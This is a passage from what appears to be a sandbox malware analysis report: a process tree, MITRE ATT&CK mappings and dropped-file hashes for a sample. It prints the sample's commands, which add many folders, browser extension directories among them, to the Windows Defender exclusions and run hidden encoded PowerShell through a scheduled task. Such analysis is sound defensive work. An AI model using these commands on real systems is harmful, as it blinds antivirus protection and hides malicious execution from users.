Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aHEACJvKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gGVtJVleRHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OWjgaygRnjJbmZVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EtAJcKWZAugUizrJ\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6060

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:6032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FaGkFfZLSayRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JGBawXrjoobU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6124

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YDZEHDnJqqKzehSUEKR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aHEACJvKU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gGVtJVleRHUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3312

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OWjgaygRnjJbmZVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:696

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:32
3⤵
PID:5816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk /t REG_DWORD /d 0 /reg:64
3⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:32
3⤵
PID:4424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EtAJcKWZAugUizrJ /t REG_DWORD /d 0 /reg:64
3⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmsAXOkQJ" /SC once /ST 13:19:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:5552

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmsAXOkQJ"
2⤵
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3108

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5720

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Security Software Discovery

T1063

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
Filesize
2.4MB

MD5
585e122bd7c35b362fb53bc614cc969f

SHA1
7a9e0cdacdd48ae058ef2c9d5e55f780175c7797

SHA256
b27d8b75109ea7c18cd6e3112f2ef39bdbec15df58c9a0c349b514a53377c5d3

SHA512
85d8c75a4ff53a09f8364ccfaf98602ae963eaa8d9126159b360070dffc3d68f98ee32d2208148b3d557bd387997d5475baf3f9bcd89d0fd27abba9468a32028

Download Submit
C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
Filesize
2.4MB

MD5
585e122bd7c35b362fb53bc614cc969f

SHA1
7a9e0cdacdd48ae058ef2c9d5e55f780175c7797

SHA256
b27d8b75109ea7c18cd6e3112f2ef39bdbec15df58c9a0c349b514a53377c5d3

SHA512
85d8c75a4ff53a09f8364ccfaf98602ae963eaa8d9126159b360070dffc3d68f98ee32d2208148b3d557bd387997d5475baf3f9bcd89d0fd27abba9468a32028

Download Submit
C:\Program Files (x86)\CR DBF\CR_DBF.exe
Filesize
4.9MB

MD5
8c250c6f114714431da873dcf2cc471e

SHA1
1d30126bb8812c6a6eeae9c49f69c25905ff3836

SHA256
5bf34aa8476a66b5d59381733144a6aa4ef28901eaad5a7965ced814ebb91408

SHA512
03cc6435d18e85359ee1f538ff127732ac2b2790f4141d8361dc3db39876090051987349153b91fdcad27a13e3dd16041b34943af30ad431594289b624885c2f

Download Submit
C:\Program Files (x86)\CR DBF\CR_DBF.exe
Filesize
4.9MB

MD5
8c250c6f114714431da873dcf2cc471e

SHA1
1d30126bb8812c6a6eeae9c49f69c25905ff3836

SHA256
5bf34aa8476a66b5d59381733144a6aa4ef28901eaad5a7965ced814ebb91408

SHA512
03cc6435d18e85359ee1f538ff127732ac2b2790f4141d8361dc3db39876090051987349153b91fdcad27a13e3dd16041b34943af30ad431594289b624885c2f

Download Submit
C:\Program Files (x86)\CR DBF\RepairDbf.ini
Filesize
25KB

MD5
ccf1d4d1e6d0165843fa99d7416d4057

SHA1
01bf656ee2bc12022c6ceeecfa68bc13144f7f99

SHA256
748793d5e491729186a86db5c02e64e9abca22a9717835801f61fb848bea1c93

SHA512
8967c145df96a62f67571032bcd8d6fd5e4c2d0cffc7c484c1932b3322a64f07baf60431457b813d65eb288a7a35fd00f856ce6931042c8780a5aeef52509483

Download Submit
C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
Filesize
4.8MB

MD5
8c0c201f8984a39bbd3dc7c19abe58f8

SHA1
67dfb8665d4636fa88131050ef6b4f820546d79b

SHA256
142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

SHA512
84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

Download Submit
C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
Filesize
4.8MB

MD5
8c0c201f8984a39bbd3dc7c19abe58f8

SHA1
67dfb8665d4636fa88131050ef6b4f820546d79b

SHA256
142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

SHA512
84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

Download Submit
C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
Filesize
4.8MB

MD5
8c0c201f8984a39bbd3dc7c19abe58f8

SHA1
67dfb8665d4636fa88131050ef6b4f820546d79b

SHA256
142a1c432e3b87e7a13b0f12846cfe9f46c2a3a52d1bc8070b5596ce99ca62e3

SHA512
84ca95ec160d88677388d83a490dc65d1d3f9e0aa9253b5ba070849d76453819ab6de283adcdc625f645b18be909067bea1b3c4a966607427fbca65a7382c5e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
539B

MD5
b75063314cfadbfa78a61db2e08b2280

SHA1
83c1963a5a148005aeee6bca4ad43535601560f7

SHA256
4babf1346bc633d6c82b2b5c9b955ef8ec77ce4098e9828b1006b5d67f75cd8c

SHA512
51500418af2fe20152efcbfe8a9d892c3ba00f5c4dded5dfd6954958fa1cd325d93429a4df28bc799316bedfd91a0c79cf0c92234311c23869450d313f14def5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
539B

MD5
3bac955fc474ae34958c782c92dce816

SHA1
c0cefbde70f4f17ae25132f954646c754cfcb1eb

SHA256
749a68273c13516df9b8db2f65520cbbb2cf7d3623732b2b68c80f45863c3954

SHA512
804eb103ebe027581b7b8d6c96b3efda434b4c2d11769ba9633b6a5c6652fb5af57f90f9274bb1ab402f036694e3fbc979af6065a11b335706f792644dc9eb4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
371B

MD5
b4fa3c35480714172003e2cf801f57d2

SHA1
ff1f2ba017962001518508b10ca523e9378f9911

SHA256
da7fb87d1db135727723da9761ce3ee26670336e9e2173f2ea7ed65745ba6728

SHA512
9f57a682c2e3a817aa0cb62b0aac550192ca5f82346b27d39590fbbc80b5f159381127dcad63b83b89508b7cd297fcdc807f91a868ecbd6a3bd9f207c537b762

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
697024bb9271eab8a9f48ac73d40b964

SHA1
bc18ee80f22a7b0afd79f5fca476499846e33b92

SHA256
33fd6014de08bb72266eae04c94341b3bc5f4334584deed814fcd810c0abdc0c

SHA512
9a6e81755b1121c5311b60d3693e6eb1b7d4ef2c6989e9f68d0376bc7b0c27b6d657369347d4702efccb2ae15cdbaa6a32c8600c0ff368d12030afe7b276c07c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
cab35aba826e8a690aa0f6b2c7307b91

SHA1
0da73f0b90096dd678763f40c839189e7925ada2

SHA256
bd419e3d714c563c1e61ca3382405bfd2e8ba48065e9797287e01945802c2224

SHA512
a2717511196e4ff9a9e6f438ba590d02bcadfa6d54de58b3411a877a9f184a36d6d09eec8b54c77859ce3b59fd13bfdb4a7121ed42aed4485cca0c2961ffbdbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
15KB

MD5
fbcbd164517e248e1ee875decbb6c510

SHA1
b1db325d1c7aceaad2add8c9a7f2a39e0c0fd37c

SHA256
98d96ee4f9cf6b78dc85ae2f4f3a2ba0b2fbaa9c003cdd8acf70081badbe25b7

SHA512
cfdd0f070fac5dbcd7515498ebb914ecfe9a70f43733866b86e27784b9a58148d6128d4894fb189b9a4b8b6f2615db6acf68503fe549b29866261480f245b2a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe588373.TMP
Filesize
120B

MD5
fbe286cfff5d3e302c39c0161af83275

SHA1
d19006ed4ddd3cc3af7a3a62d98a60fd9205cff2

SHA256
bf4916c4008f5018f9fc574e057eaeb3044d2bea8b0d1f8e827045e3366e7634

SHA512
378378467445929acf126b5f31643ed87dcb659db393a4e0c33287cbe2ec7bd4f343396cfe04d3360c84b1745af8338ca2e1b1a73cf5fe6aac597f40256a24c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
201KB

MD5
29e2d70e70194be3ca36809fa34a4847

SHA1
4bf0bd23d459aeee2b2d6dc43f8b812af7e1199b

SHA256
0567f88d20a686e28d7a65935a27753c8f94e6010fd5fdc1431c49f479c30fbe

SHA512
9632c15c844960b7b20fb5469b7d45ad133d55a6b4c1fe1124c04ab759c6a5123e9827eff2058d011a35f4f45fbe89f2e92f4f350219d989a7d2c947521f06b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
72KB

MD5
fd6b652c3b8621c224d144b5db6bf7c8

SHA1
5d8b3329e5dee762e8c4fde078c3c4b370186cd0

SHA256
5ae2ff029d579fc7838f0caae695c08d79ad7ee0aa80598bec710342f694d058

SHA512
ff7ce85969857dfb8ea6681f257b73dc24139660eff804fcadee8ac76e3a61cee03245c6c8bd0bd14b4771565ede515472384a80ebc3ec3f389c930bc014d0a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize
2KB

MD5
24cd57a8710ead89af77751cc4ce3236

SHA1
d66a76341ec9d1f53adc3caedfbc2a78e1055a30

SHA256
ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91

SHA512
903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
cd4f5fe0fc0ab6b6df866b9bfb9dd762

SHA1
a6aaed363cd5a7b6910e9b3296c0093b0ac94759

SHA256
3b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81

SHA512
7072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1d40312629d09d2420e992fdb8a78c1c

SHA1
903950d5ba9d64ec21c9f51264272ca8dfae9540

SHA256
1e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac

SHA512
a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000001.dbtmp
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
4efd2e188c50a5e6272777776c858f70

SHA1
c7967d2bb5ffe3f6b115c12c6b2167a1569938a9

SHA256
8793475e0177f54e78c0dbf2740cd513d5f23829377c49457e81e6552a5eb614

SHA512
1197d9f094b913acc5f47570277f1cf457c13b8269e429eb92ae4a50459399db700dcabbf52b040ba4618e2dedddd584807b5005e498eaf0aaa1cc4a3358e21d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
626B

MD5
9de87afc44efc7b6d0abdaa0b1d6ee1b

SHA1
d2a6c94f7a82d9d938362a1d7818c66aa6e14d4f

SHA256
82dc8457482e8d334cf8e4a24f1b9b1d23ec224715f1f4095564152544a90098

SHA512
78c953ec4a4b65626c154c1442eb468e6269025d4a399aeaf4864ab8beb994f9c5fad024a53d7479cd3c2a08b0e419d271e9c022bf80cf6a297b3be315cec711

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
60a2fe617479873014c2259ef569cdcc

SHA1
2e3982d1812ab57e0cf13cac15d5bf45d907eb86

SHA256
82332c553dcead1d3667237516c3b8a72e9d9fc4618e639c35b68ea00b9bc54b

SHA512
a6cec5f47c7bd20ccae03a3854fa20260516344847f7b585827cbe1ac3a539592f0a21cee0dd36e5ebcd4a0ab527c8c8496aececcc45a181682656db08f14437

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
4b1aa609f2fe89aab2f3f3d87a0c6e0e

SHA1
4bd9d4c4948a4b078daf8ad1046aa13a9219aebc

SHA256
6fa32dfb81f8f5817a55f3e6f66bda7d0549e5069f37e14d9a1e7558ab90c05a

SHA512
d36cb529063412c129f2670f4e085fe52ba5b2e5ab53db1866e3ccb4758833fbd39a5cb89248d185cf348331dfa4b6a85865ed82edf421a5df010b829f249195

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
63353962d7a46bc1f0a035db6733bbb7

SHA1
e567a51910826ca591c81fb4edb0836378c5d864

SHA256
e98ef3df6bf84b947e435f1a06db0a436ea3264e126e330ae1bd760e07e20904

SHA512
6c738b9d219536b7a8617a82627982a5c12ff71dd27842102df67220ac387f2ffebfe0be47387071e6e00055476af4cbb6a6136a4e1acdd37020a3c722d9fbf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
1463bf2a54e759c40d9ad64228bf7bec

SHA1
2286d0ac3cfa9f9ca6c0df60699af7c49008a41f

SHA256
9b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df

SHA512
33e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
5a372f4457ec00316229e991b5fd4ca0

SHA1
846400c27fec06790cca91dbc4bdda09c7656ecf

SHA256
1583fbaab3851407b415bd468860607af65eae4753cb3a5ba5d41a2930c14d5e

SHA512
72de0fac6a4a553f0164b2f4b78b0577cc8ef4f78ce48e0ef09116573e1509e8cac8b651fe6a6f7f1d059a61188132719447d83cfe76547625d19dd237de4754

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
96fc6bed2043391d9abf3180b89a7828

SHA1
4382fce67b6c4ad7de51bac4735789346e9d6c7f

SHA256
88ec608643ff2e1826751c456f6979162caae5170c5c96212e24c6951b01b9f8

SHA512
dd48fcf8ffb1d4447006a77b2ab44c09c24f4da20a3edd816561ddbdfa4dfa98c82f922b96de0a55650e2e78b688fb8559a3d1736ea99246a507a028871150ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
eb6332ae9e8fec69c2236355e2638f9d

SHA1
71500d57fb304979afd6756f06d4b9a59f995eb7

SHA256
